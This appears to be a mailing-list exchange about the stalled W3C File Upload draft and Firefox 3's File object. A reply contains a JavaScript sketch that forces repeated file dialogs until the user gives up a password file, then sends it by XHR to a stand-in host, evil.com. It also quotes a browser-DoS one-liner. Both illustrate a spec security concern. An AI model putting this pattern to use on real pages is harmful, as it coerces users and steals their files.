Garrett Smith wrote:
The File object is useful for uploading files via XHR. It provides
functionality for data to be retrieved from a file submitted to a
form using the input type "file".

It is currently a Working Draft:
 http://www.w3.org/TR/file-upload/
 http://dev.w3.org/2006/webapi/FileUpload/publish/FileUpload.html

Implemented differently in Firefox 3.
 http://developer.mozilla.org/en/docs/nsIDOMFile
 https://bugzilla.mozilla.org/show_bug.cgi?id=371432

An example in Firefox 3:
http://dhtmlkitchen.com/ape/example/form/Form.html

It is a useful feature for in-page file upload, without resorting
to IFRAME hackery.

What is the status of File Upload?

Firefox 3's implementation is different than the w3c working draft. The
spec author seems to have abandoned that, so now there's a working
draft which seems to be collecting dust for a couple of years.

What is going on with File Upload specification? It would be a useful
feature, but with only a half-legged attempt at a spec that the author
abandoned, and a different implementation in Firefox 3, other browsers
probably won't implement this functionality any time soon. It's useful
in Firefox 3, and would be even better if there were some mime-type
sniffing (mediaType).

There seems to be a need for failing test cases, so implementations
can fill in the "???"'s. Any other suggestions for getting this thing
done?

The spec only really supplies one feature over what Firefox 3 has: The ability to open a file dialog strictly from Javascript without any UI objects involved.

I'm not sure if this is a super desirable feature from a security point of view. Technically speaking a site could take a user's browser hostage unless the user agrees to give up a sensitive file:

function checkForFile(e) {
  if (!e || !fileIsPasswordFile(e.fileList[0])) {
    alert("Give me your passw0rd file!");
    var fd = new FileDialog();
    fd.addEventListenerNS(
      "http://www.w3.org/ns/fs-event#", "files-selected", checkForFile,
       false);
    fd.open();
  }
  else {
    xhr = new XMLHttpRequest();
    xhr.open("GET", "http://evil.com/passwordsaver.cgi", false);
    xhr.send(e.fileList[0]);
  }
}
checkForFile();

Granted, there are certainly many ways to DoS a browser already (while(1) alert('ha');) but the above is somewhat more sinister.

/ Jonas
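
Added illustration, not part of the original message or of any browser's code: a toy model of the defensive side of the concern above, where a user agent honours a script's request for a file dialog only when it follows a recent user gesture. The class, function and the 5-second window are hypothetical choices for the example.

```javascript
// Toy model of a user agent's policy for script-opened file dialogs.
// DialogPolicy, countDialogsShown and ACTIVATION_WINDOW_MS are hypothetical
// names and values chosen for this illustration.
const ACTIVATION_WINDOW_MS = 5000; // assumed lifetime of one user gesture

class DialogPolicy {
  constructor(requireGesture) {
    this.requireGesture = requireGesture;
    this.gestureAt = null; // time of the last unconsumed click or key press
  }

  // The browser records a real user gesture (not something script can fake).
  userGesture(now) {
    this.gestureAt = now;
  }

  // Decide whether a script call to open a file dialog is honoured.
  mayOpenDialog(now) {
    if (!this.requireGesture) return true; // behaviour the message worries about
    const fresh = this.gestureAt !== null &&
      now - this.gestureAt <= ACTIVATION_WINDOW_MS;
    this.gestureAt = null; // one gesture buys at most one dialog
    return fresh;
  }
}

// Replays the re-prompt pattern from the message: the page asks for a dialog,
// and asks again each time the user cancels. `clickAt` is when the user
// clicked the page (null for never). Returns how many dialogs were shown.
function countDialogsShown(policy, attempts, clickAt) {
  let shown = 0;
  if (clickAt !== null) policy.userGesture(clickAt);
  for (let i = 0; i < attempts; i++) {
    const now = 1000 * (i + 1); // each cancel takes the user one second
    if (!policy.mayOpenDialog(now)) break; // refused: the loop cannot continue
    shown++;
  }
  return shown;
}

// Constructed scenarios: ten open() attempts by the page.
console.log("no gesture rule:        ", countDialogsShown(new DialogPolicy(false), 10, null));
console.log("gesture rule, no click: ", countDialogsShown(new DialogPolicy(true), 10, null));
console.log("gesture rule, one click:", countDialogsShown(new DialogPolicy(true), 10, 0));
```

Because each gesture is consumed by the dialog it authorises, the re-prompt from inside the "files-selected" handler is refused and the loop ends after at most one dialog.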
